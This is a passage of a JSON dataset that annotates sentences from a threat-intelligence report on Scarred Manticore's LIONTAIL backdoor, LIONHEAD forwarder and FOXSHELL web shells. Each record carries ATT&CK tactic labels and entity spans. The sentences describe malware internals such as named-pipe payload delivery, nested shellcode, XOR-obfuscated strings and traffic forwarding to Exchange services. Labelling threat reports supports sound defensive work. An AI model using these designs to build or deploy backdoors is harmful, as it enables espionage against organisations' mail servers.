51, "end": 68, "label": "Action" }, { "text": "named pipe", "start": 76, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "installed on internal servers", "start": 118, "end": 147, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p9-s79-fa77f1", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 9, "sentence_id": 79, "context_before": "Instead of listening on URL prefixes, this version gets its payloads from a named pipe and likely is designated to be installed on internal servers with no access to the public web.", "sentence_text": "The configuration of the malware is a bit different:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p10-s81-68fe1a", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 10, "sentence_id": 81, "context_before": "QWORD var_0\n9/31", "sentence_text": "QWORD var_8\nQWORD var_10\nDWORD var_18\nDWORD dwOpenMode\nDWORD dwPipeMode\nDWORD nMaxInstances\nDWORD nOutBufferSize\nDWORD nInBufferSize\nDWORD nDefaultTimeOut\nSTRING pipe_name\nThe main shellcode starts with converting the string security descriptor \"D:\n(A;;FA;;;WD)” into a valid, functional security descriptor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p10-s82-40fa4c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 10, "sentence_id": 82, "context_before": "QWORD var_8\nQWORD var_10\nDWORD var_18\nDWORD dwOpenMode\nDWORD dwPipeMode\nDWORD nMaxInstances\nDWORD nOutBufferSize\nDWORD nInBufferSize\nDWORD nDefaultTimeOut\nSTRING pipe_name\nThe main shellcode starts with converting the string security descriptor \"D:\n(A;;FA;;;WD)” into a valid, functional security descriptor.", "sentence_text": "In this case, the security descriptor allows (A) File All Access (FA) to everyone (WD).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p10-s83-ae7f13", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 10, "sentence_id": 83, "context_before": "In this case, the security descriptor allows (A) File All Access (FA) to everyone (WD).", "sentence_text": "The security descriptor is then used to create a named pipe based on the values provided in the configuration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p10-s84-ae3401", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 10, "sentence_id": 84, "context_before": "The security descriptor is then used to create a named pipe based on the values provided in the configuration.", "sentence_text": "In the samples we observed, the name of the pipe used is \\\\.\\pipe\\test- pipe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p10-s85-e069b8", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 10, "sentence_id": 85, "context_before": "In the samples we observed, the name of the pipe used is \\\\.\\pipe\\test- pipe.", "sentence_text": "Instead, it relies on standard kernel32.dll APIs such as CreateNamedPipe, and ReadFileWriteFile.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p10-s86-141ed0", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 10, "sentence_id": 86, "context_before": "Instead, it relies on standard kernel32.dll APIs such as CreateNamedPipe, and ReadFileWriteFile.", "sentence_text": "The communication of named pipes-based LIONTAIL is identical to the HTTP version, with the same encryption mechanism and the same structure of the payload which runs as a shellcode in memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p10-s87-b88713", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 10, "sentence_id": 87, "context_before": "The communication of named pipes-based LIONTAIL is identical to the HTTP version, with the same encryption mechanism and the same structure of the payload which runs as a shellcode in memory.", "sentence_text": "LIONTAIL in-memory components Types of payloads 10/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p11-s88-fc7915", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 11, "sentence_id": 88, "context_before": "LIONTAIL in-memory components Types of payloads 10/31", "sentence_text": "After the LIONTAIL loader decrypts the payload and its argument received from the attackers’ C&C server, it starts with parsing the argument.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Decrypt payload and arguments received from a C2 server and parse them for execution.", "entities": [ { "text": "the LIONTAIL loader", "start": 6, "end": 25, "label": "MalwareTool" }, { "text": "decrypts the payload", "start": 26, "end": 46, "label": "Action" }, { "text": "C&C server", "start": 93, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "starts with parsing the argument", "start": 108, "end": 140, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p11-s89-41026c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 11, "sentence_id": 89, "context_before": "After the LIONTAIL loader decrypts the payload and its argument received from the attackers’ C&C server, it starts with parsing the argument.", "sentence_text": "It is a structure that describes a type of payload for the shellcode to execute and it is built differently depending on the type of payload:\nTYPE = 1 – Execute another shellcode:\nDWORD type // 1 QWORD shellcode_size _BYTE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p11-s90-1b638e", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 11, "sentence_id": 90, "context_before": "It is a structure that describes a type of payload for the shellcode to execute and it is built differently depending on the type of payload:\nTYPE = 1 – Execute another shellcode:\nDWORD type // 1 QWORD shellcode_size _BYTE", "sentence_text": "[] Shellcode TYPE = 2 – Execute the specified API function:\nDWORD type // 2 CHAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p11-s92-feb11e", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 11, "sentence_id": 92, "context_before": "[] library_name CHAR", "sentence_text": "[] api_name The argument for the API execution has the following structure:\nDWORD need_to_be_freed_flag\nQWORD argument_size\n_BYTE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p11-s93-2cdb07", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 11, "sentence_id": 93, "context_before": "[] api_name The argument for the API execution has the following structure:\nDWORD need_to_be_freed_flag\nQWORD argument_size\n_BYTE", "sentence_text": "[] argument\nNext stages\nTo make things more complicated, Scarred Manticore wraps the final payload in nested shellcodes.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The malware wraps payloads in nested shellcodes to evade detection.", "entities": [ { "text": "wraps the final payload", "start": 75, "end": 98, "label": "Action" }, { "text": "nested shellcodes", "start": 102, "end": 119, "label": "Infrastructure_Indicator" }, { "text": "Scarred Manticore", "start": 57, "end": 74, "label": "ThreatActor" } ] }, { "uid": "aptnotes-04_aptnotes_report-p12-s94-0b43b6", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 94, "context_before": "[] argument\nNext stages\nTo make things more complicated, Scarred Manticore wraps the final payload in nested shellcodes.", "sentence_text": "Data fromSecureBoot\\State registry key (the same data)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p12-s95-7e0e59", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 95, "context_before": "Data fromSecureBoot\\State registry key (the same data)", "sentence_text": "Data from System\\Bios registry key (the same data)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p12-s96-84ddf6", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 96, "context_before": "Data from System\\Bios registry key (the same data)", "sentence_text": "DWORD last_error (GetEnvironmentVariableA)\nDWORD last_error (NtOpenKey CurrentVersion)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p12-s97-c2a0f8", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 97, "context_before": "DWORD last_error (GetEnvironmentVariableA)\nDWORD last_error (NtOpenKey CurrentVersion)", "sentence_text": "DWORD last_error (NtQueryKey CurrentVersion)\nDWORD num_of_values (CurrentVersion)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p12-s98-10bba4", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 98, "context_before": "DWORD last_error (NtQueryKey CurrentVersion)\nDWORD num_of_values (CurrentVersion)", "sentence_text": "DWORD last_error (NtOpenKey SecureBoot\\State)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p12-s99-dec329", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 99, "context_before": "DWORD last_error (NtOpenKey SecureBoot\\State)", "sentence_text": "DWORD last_error (NtQueryKey SecureBoot\\State)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p12-s100-03d92f", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 100, "context_before": "DWORD last_error (NtQueryKey SecureBoot\\State)", "sentence_text": "DWORD num_of_values (SecureBoot\\State)\nDWORD last_error (NtOpenKey System\\Bios)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p12-s101-db16e7", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 101, "context_before": "DWORD num_of_values (SecureBoot\\State)\nDWORD last_error (NtOpenKey System\\Bios)", "sentence_text": "DWORD last_error (NtQueryKey System\\Bios)\nDWORD num_of_values (System\\Bios)\nQWORD num_of_proccesors\nQWORD total_RAM\nQWORD tick_count\nQWORD is_64_bit\n_CHAR[0X10] computer_name\n_CHAR[0X10] domain_name\n_BYTE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p12-s102-5e9b83", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 12, "sentence_id": 102, "context_before": "DWORD last_error (NtQueryKey System\\Bios)\nDWORD num_of_values (System\\Bios)\nQWORD num_of_proccesors\nQWORD total_RAM\nQWORD tick_count\nQWORD is_64_bit\n_CHAR[0X10] computer_name\n_CHAR[0X10] domain_name\n_BYTE", "sentence_text": "[] CurrentVersion_data\n_BYTE[] SecureBootState_data\n_BYTE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p13-s104-a94592", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 104, "context_before": "[] SystemBios_data\n12/31", "sentence_text": "Additional Tools\nIn addition to using LIONTAIL, Scarred Manticore was observed leveraging other custom components.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The threat actor uses additional custom components.", "entities": [ { "text": "Scarred Manticore", "start": 48, "end": 65, "label": "ThreatActor" }, { "text": "using LIONTAIL", "start": 32, "end": 46, "label": "Action" }, { "text": "leveraging other custom components", "start": 79, "end": 113, "label": "Action" }, { "text": "LIONTAIL", "start": 38, "end": 46, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p13-s105-1ec499", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 105, "context_before": "Additional Tools\nIn addition to using LIONTAIL, Scarred Manticore was observed leveraging other custom components.", "sentence_text": "LIONHEAD web forwarder On some of the compromised exchange servers, the actors deployed LIONHEAD, a tiny web forwarder.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Deploy the LIONHEAD web forwarder on compromised Exchange servers to maintain access or relay traffic.", "entities": [ { "text": "LIONHEAD", "start": 88, "end": 96, "label": "MalwareTool" }, { "text": "deployed LIONHEAD", "start": 79, "end": 96, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p13-s106-515560", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 106, "context_before": "LIONHEAD web forwarder On some of the compromised exchange servers, the actors deployed LIONHEAD, a tiny web forwarder.", "sentence_text": "LIONHEAD is also installed as a service using the same phantom DLL hijacking technique as LIONTAIL and utilizes similar mechanisms to forward the traffic directly to Exchange Web Services (EWS) endpoints.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Install LIONHEAD as a service via DLL hijacking and forward traffic to Exchange Web Services endpoints.", "entities": [ { "text": "LIONHEAD", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "installed as a service using the same phantom DLL hijacking technique", "start": 17, "end": 86, "label": "Action" }, { "text": "utilizes similar mechanisms to forward the traffic directly to Exchange Web Services (EWS) endpoints", "start": 103, "end": 203, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p13-s107-3dee3c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 107, "context_before": "LIONHEAD is also installed as a service using the same phantom DLL hijacking technique as LIONTAIL and utilizes similar mechanisms to forward the traffic directly to Exchange Web Services (EWS) endpoints.", "sentence_text": "LIONHEAD’s configuration is different from LIONTAIL:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p13-s108-f014b0", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 108, "context_before": "LIONHEAD’s configuration is different from LIONTAIL:", "sentence_text": "DWORD timeout 0x493E0 DWORD forward_port 444 STRING end_string '' STRING forward_server 'localhost' STRING forward_path '/ews/exchange.asmx' STRING[] listen_urls 'https://+:443//' The backdoor registers the listen_urls prefixes in the same way as LIONTAIL and listens for requests.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.002", "name": "External Proxy" }, { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Configure and deploy backdoor to listen on HTTPS URLs and forward traffic to Exchange Web Services.", "entities": [ { "text": "backdoor", "start": 204, "end": 212, "label": "MalwareTool" }, { "text": "https://+:443/", "start": 173, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "listens for requests", "start": 280, "end": 300, "label": "Action" }, { "text": "/ews/exchange.asmx", "start": 131, "end": 149, "label": "Infrastructure_Indicator" }, { "text": " registers the listen_urls prefixes", "start": 212, "end": 247, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p13-s109-cfce5e", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 109, "context_before": "DWORD timeout 0x493E0 DWORD forward_port 444 STRING end_string '' STRING forward_server 'localhost' STRING forward_path '/ews/exchange.asmx' STRING[] listen_urls 'https://+:443//' The backdoor registers the listen_urls prefixes in the same way as LIONTAIL and listens for requests.", "sentence_text": "Next, the backdoor gets a response from forward_server and sends it back to the URL that received the original request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Receive a response from a remote server and forward it back to the original requester to maintain communication flow.", "entities": [ { "text": "the backdoor", "start": 6, "end": 18, "label": "MalwareTool" }, { "text": "gets a response", "start": 19, "end": 34, "label": "Action" }, { "text": "forward_server", "start": 40, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "sends it back", "start": 59, "end": 72, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p13-s110-761b26", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 110, "context_before": "Next, the backdoor gets a response from forward_server and sends it back to the URL that received the original request.", "sentence_text": "This forwarder might be used to bypass the restrictions on external connections to EWS, hide the real consumer of EWS data being external, and consequently conceal data exfiltration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p13-s111-9171ed", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 111, "context_before": "This forwarder might be used to bypass the restrictions on external connections to EWS, hide the real consumer of EWS data being external, and consequently conceal data exfiltration.", "sentence_text": "Web shells\nScarred Manticore deploys multiple web shells, including those previously attributed indirectly to OilRig.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deploy multiple web shells to maintain access on compromised systems.", "entities": [ { "text": "Scarred Manticore", "start": 11, "end": 28, "label": "ThreatActor" }, { "text": "deploys multiple web shells", "start": 29, "end": 56, "label": "Action" }, { "text": "web shells", "start": 46, "end": 56, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p13-s112-0d831c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 112, "context_before": "Web shells\nScarred Manticore deploys multiple web shells, including those previously attributed indirectly to OilRig.", "sentence_text": "Some of these web shells stand out due to their obfuscations, naming conventions and artifacts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p13-s113-2f7cd6", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 13, "sentence_id": 113, "context_before": "Some of these web shells stand out due to their obfuscations, naming conventions and artifacts.", "sentence_text": "The web shells retain class and method obfuscation and a similar string encryption algorithm (XOR with one byte, the key is derived from the first byte or from the first 2 bytes) to many other web shells and .NET-based tools used by Scarred Manticore in their attacks over the past few years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p14-s115-b5f01a", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 14, "sentence_id": 115, "context_before": "13/31", "sentence_text": "One of those shells is a heavily obfuscated and slightly modified version of an open-source XML/XSL transform web shell, Xsl Exec Shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p14-s116-723e58", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 14, "sentence_id": 116, "context_before": "One of those shells is a heavily obfuscated and slightly modified version of an open-source XML/XSL transform web shell, Xsl Exec Shell.", "sentence_text": "This web shell also contains two obfuscated functions that return the string “~/1.aspx”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p14-s117-da8aab", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 14, "sentence_id": 117, "context_before": "This web shell also contains two obfuscated functions that return the string “~/1.aspx”.", "sentence_text": "The majority of the impacted entities belong to government, telecommunications, military, and financial sectors, as well as IT services providers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p14-s118-40bfa3", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 14, "sentence_id": 118, "context_before": "The majority of the impacted entities belong to government, telecommunications, military, and financial sectors, as well as IT services providers.", "sentence_text": "However, we also observed the infection on the Exchange servers belonging to a regional affiliate of a global non-profit humanitarian network.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "The infection was observed on Exchange servers.", "entities": [ { "text": "observed the infection", "start": 17, "end": 39, "label": "Action" }, { "text": "Exchange servers", "start": 47, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p14-s119-81d920", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 14, "sentence_id": 119, "context_before": "However, we also observed the infection on the Exchange servers belonging to a regional affiliate of a global non-profit humanitarian network.", "sentence_text": "The geographic region and the targeted profile are aligned with Iranian interests and in line with the typical victim profile that MOIS-affiliated clusters usually target in espionage operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p15-s121-446686", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 15, "sentence_id": 121, "context_before": "14/31", "sentence_text": "Previously, DEV-0861, a cluster we believed aligns with Scarred Manticore, was publicly exposed for the initial access to and data exfiltration from the Albanian government networks, as well as email exfiltration from multiple organizations in the Middle Eastern countries such as Kuwait, Saudi Arabia, Turkey, UAE, and Jordan.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Gain initial access to government networks and exfiltrate data and emails from multiple targeted organizations.", "entities": [ { "text": "initial access", "start": 104, "end": 118, "label": "Action" }, { "text": "data exfiltration", "start": 126, "end": 143, "label": "Action" }, { "text": "email exfiltration", "start": 194, "end": 212, "label": "Action" }, { "text": "DEV-0861", "start": 12, "end": 20, "label": "ThreatActor" } ] }, { "uid": "aptnotes-04_aptnotes_report-p15-s122-8c1773", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 15, "sentence_id": 122, "context_before": "Previously, DEV-0861, a cluster we believed aligns with Scarred Manticore, was publicly exposed for the initial access to and data exfiltration from the Albanian government networks, as well as email exfiltration from multiple organizations in the Middle Eastern countries such as Kuwait, Saudi Arabia, Turkey, UAE, and Jordan.", "sentence_text": "Attribution and Historical Activity Since at least 2019, Scarred Manticore deployed unique tools on compromised Internet- facing Windows servers in the Middle East region.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The threat actor deployed tools on compromised servers.", "entities": [ { "text": "Scarred Manticore", "start": 57, "end": 74, "label": "ThreatActor" }, { "text": "deployed unique tools", "start": 75, "end": 96, "label": "Action" }, { "text": "Windows servers", "start": 129, "end": 144, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p15-s123-5e8b95", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 15, "sentence_id": 123, "context_before": "Attribution and Historical Activity Since at least 2019, Scarred Manticore deployed unique tools on compromised Internet- facing Windows servers in the Middle East region.", "sentence_text": "During these years, their toolset went through significant development.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p15-s124-699f24", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 15, "sentence_id": 124, "context_before": "During these years, their toolset went through significant development.", "sentence_text": "It began as open-source-based web-deployed proxies and 15/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p16-s125-0971a2", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 16, "sentence_id": 125, "context_before": "It began as open-source-based web-deployed proxies and 15/31", "sentence_text": "over time evolved to become a diverse and powerful toolset that utilizes both custom-written and open-source components.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p16-s127-3642f8", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 16, "sentence_id": 127, "context_before": "Manticore.", "sentence_text": "Tunna-based web shell One of the earliest samples related to the threat actor’s activity is based on a web shell from Tunna, an open-source tool designed to tunnel any TCP communication over HTTP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p16-s128-c93359", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 16, "sentence_id": 128, "context_before": "Tunna-based web shell One of the earliest samples related to the threat actor’s activity is based on a web shell from Tunna, an open-source tool designed to tunnel any TCP communication over HTTP.", "sentence_text": "The web shell used by the threat actor has the internal version Tunna v1.1g (only version 1.1a is available on Github).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p16-s129-118fdd", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 16, "sentence_id": 129, "context_before": "The web shell used by the threat actor has the internal version Tunna v1.1g (only version 1.1a is available on Github).", "sentence_text": "The most significant change from the open-source version is the encryption of requests and responses by XORing the data with the pre-defined string szEncryptionKey and appending the constant string K_SUFFIX at the end:\n16/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p17-s131-737693", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 17, "sentence_id": 131, "context_before": "FOXSHELL:", "sentence_text": "XORO version Over time, the code was refactored and lost its resemblance to Tunna.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p17-s132-f68572", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 17, "sentence_id": 132, "context_before": "XORO version Over time, the code was refactored and lost its resemblance to Tunna.", "sentence_text": "We track this and all further versions as FOXSHELL.\n17/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p18-s133-892cab", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 18, "sentence_id": 133, "context_before": "We track this and all further versions as FOXSHELL.\n17/31", "sentence_text": "The biggest changes resulted from organizing multiple entities into classes using an objective-oriented approach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p18-s134-ceabb9", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 18, "sentence_id": 134, "context_before": "The biggest changes resulted from organizing multiple entities into classes using an objective-oriented approach.", "sentence_text": "The following class structure persists in most of the FOXSHELL versions:\nAll the functionality responsible for encrypting the traffic moved to a separate EncryptionModule class.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p18-s135-f439ed", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 18, "sentence_id": 135, "context_before": "The following class structure persists in most of the FOXSHELL versions:\nAll the functionality responsible for encrypting the traffic moved to a separate EncryptionModule class.", "sentence_text": "This class loads a .NET DLL embedded in a base64- encoded string inside the body of FOXSHELL and invokes its encrypt and decrypt methods:\n18/31", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "The malware loads an embedded DLL and invokes its functions.", "entities": [ { "text": "loads a .NET DLL", "start": 11, "end": 27, "label": "Action" }, { "text": "invokes its encrypt and decrypt methods", "start": 97, "end": 136, "label": "Action" }, { "text": "FOXSHELL", "start": 84, "end": 92, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p19-s136-097cf1", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 19, "sentence_id": 136, "context_before": "This class loads a .NET DLL embedded in a base64- encoded string inside the body of FOXSHELL and invokes its encrypt and decrypt methods:\n18/31", "sentence_text": "The embedded encryption module’s name is XORO.dll, and its class Encryption.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p19-s137-acc4da", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 19, "sentence_id": 137, "context_before": "The embedded encryption module’s name is XORO.dll, and its class Encryption.", "sentence_text": "XORO implements decrypt and encrypt methods the same way as the Tunna-based web shell, using the same hardcoded values:\n19/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p20-s138-7cbdfc", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 20, "sentence_id": 138, "context_before": "XORO implements decrypt and encrypt methods the same way as the Tunna-based web shell, using the same hardcoded values:\n19/31", "sentence_text": "All requests to the web shell are also encapsulated within a class called Package, which handles different PackageTypes:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p21-s139-2fb7e4", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 21, "sentence_id": 139, "context_before": "All requests to the web shell are also encapsulated within a class called Package, which handles different PackageTypes:", "sentence_text": "FOXSHELL: Bsae64 version (not a typo)\nThis version of the web shell is still unobfuscated, and its internal version is specified in the code:\nconst string Version = \"1.5\" The web shell also contains the default EncryptionDll embedded inside.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p21-s140-a0b7ad", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 21, "sentence_id": 140, "context_before": "FOXSHELL: Bsae64 version (not a typo)\nThis version of the web shell is still unobfuscated, and its internal version is specified in the code:\nconst string Version = \"1.5\" The web shell also contains the default EncryptionDll embedded inside.", "sentence_text": "The module’s name is Base64.dll, and the encryption class, which is misspelled as Bsae64, exposes the encrypt and decrypt methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p21-s141-cb060b", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 21, "sentence_id": 141, "context_before": "The module’s name is Base64.dll, and the encryption class, which is misspelled as Bsae64, exposes the encrypt and decrypt 